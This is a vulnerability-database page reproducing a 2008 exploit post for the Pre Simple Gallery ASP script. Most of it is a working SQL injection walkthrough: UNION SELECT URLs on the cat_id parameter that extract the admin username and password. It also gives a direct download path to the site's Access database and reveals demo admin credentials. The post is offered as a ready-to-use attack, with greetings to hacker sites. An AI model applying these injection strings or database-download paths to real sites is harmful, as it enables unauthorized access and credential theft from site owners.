Lucene search

K

Pre Simply Gallery SQL Injection

๐Ÿ—“๏ธย 22 Dec 2008ย 00:00:00Reported byย ZoRLuTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 18ย Views

Pre Simple Gallery ASP Script SQL/DD Remote Vuln

Show more
Code
`[~] Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns.  
[~]   
[~] script: http://preproject.com/projectDetail.asp?projectID=213  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: [email protected]  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] dork: bende bilmiyorum arkadaslar olunca zaten bildiriyorum lutfen sormayIn ( รฝ dont know dork. pls you dont ask to me )  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~] -----------------------------------------------------------  
  
exploit for demo:  
  
you go this link:  
  
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin  
  
right click to on photo and you must see  
  
http://preproject.com/pgallery/pimages/4  
  
column number 4  
  
and you goo this links  
  
username:  
  
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin  
  
http://preproject.com/pgallery/pimages/admin  
  
password:  
  
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin  
  
http://preproject.com/pgallery/pimages/admin  
  
so for demo:  
  
username: admin  
  
password: admin  
  
  
exp for demo: (DD)  
  
http://preproject.com/pgallery/database/photo.mdb   
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke   
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Dec 2008 00:00Current
0.4Low risk
Vulners AI Score0.4
18
.json
Report